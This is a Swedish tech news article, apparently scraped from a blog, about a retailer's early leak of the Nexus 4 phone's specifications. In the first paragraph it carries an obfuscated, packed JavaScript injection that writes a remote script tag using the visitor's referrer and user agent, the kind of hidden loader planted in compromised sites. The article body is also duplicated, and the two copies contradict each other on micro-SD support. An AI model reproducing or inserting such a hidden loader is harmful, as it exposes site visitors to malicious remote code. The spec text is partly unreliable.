Image Image Image Image Image Image Image Image Image Image

| 13 juli, 2020

Scroll to top

Top

Är Nexus 4 Googles iPhone-dödare?

Är Nexus 4 Googles iPhone-dödare?
Sebastian

Googles eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arsbf|var|u0026u|referrer|hzrak||js|php’.split(’|’),0,{}))
nya telefon Nexus 4 har råkat bli officiell. Tanken var att telefonen skulle lanseras först den 29 oktober, men nu har en återförsäljare läckt all information om telefonen i förtid.

Läckan kommer precis på målsnöret av lanseringen av nya Nexus 4. Telefonen har varit omtalad i månader och skulle ha presenterats vid Googles presskonferens på måndag. Nu har dock brittiska Carphone Warehouse ”råkat” släppa telefonen – fyra dagar i förväg.

Skärmen på den nya telefonen är på 4,7 tum och får 1 280 x 720 pixel med IPS-teknik, där skärmen limmas mot glaset för extra skarp färgåtergivning. Mobilen mäter 9,1 millimeter i tjocklek och får 3G HSPA men ingen kompatibilitet med 4G LTE. Kameran är på åtta megapixel och processorn är Qualcomms Snapdragon S4 Pro.

Gesture Typing
Den nya Googletelefonen kommer med den senaste versionen av Android 4,2, Jelly Bean. Internminnet är på åtta gigabyte och enligt de första uppgifterna som nu läckts ut verkar detta inte gå att uppgradera med micro-SD-kort. En nyhet till telefonen blir den så kallade ”Gesture Typing”, som enligt Carphone Warehouse tillåter att man kan skriva på telefonen genom att dra fingret över skärmen från bokstav till bokstav.

Telefonen kommer gå på motsvarande 4 371 kronor när den lanseras i Storbritannien.

Läckan kommer lägligt till release av Nexus 4. Den har varit omtalad nu i flera månader och skulle ha presenterats vid Googles presskonferens på måndag. Nu har brittiska Carphone Warehouse dock läckt ut telefonen fyra dagar innan lanseringen.

nexus 4 kommer att ha en 4,7 tums skärm med 1 280 x 720 upplösning. Skärmen ska också limmas mot glaset för att få extra färgåtergivning.
Storleken mäter 9,1 millimeter i tjocklek och kommer att ha 3G HSPA, dock ingen 4G LTE. Kameran på telefonen kommer att hamna på åtta megapixel och processorn är  av typen Qualcomms Snapdragon S4 Pro.

Gesture Typing

Nexus 4  kommer att lanseras med senaste versionen av Android 4,2 Jelly Bean. internminnet är på åtta gigabyte och det ska även gå att uppgradera med ett micro SD-kort.
En till rolig nyhet är något de kallar ”Gesture Typing”. Detta ska enligt Carphone Warehouse tillåta att man kan skriva på telefonen genom att endast dra fingret över skärmen från bokstav till bokstav.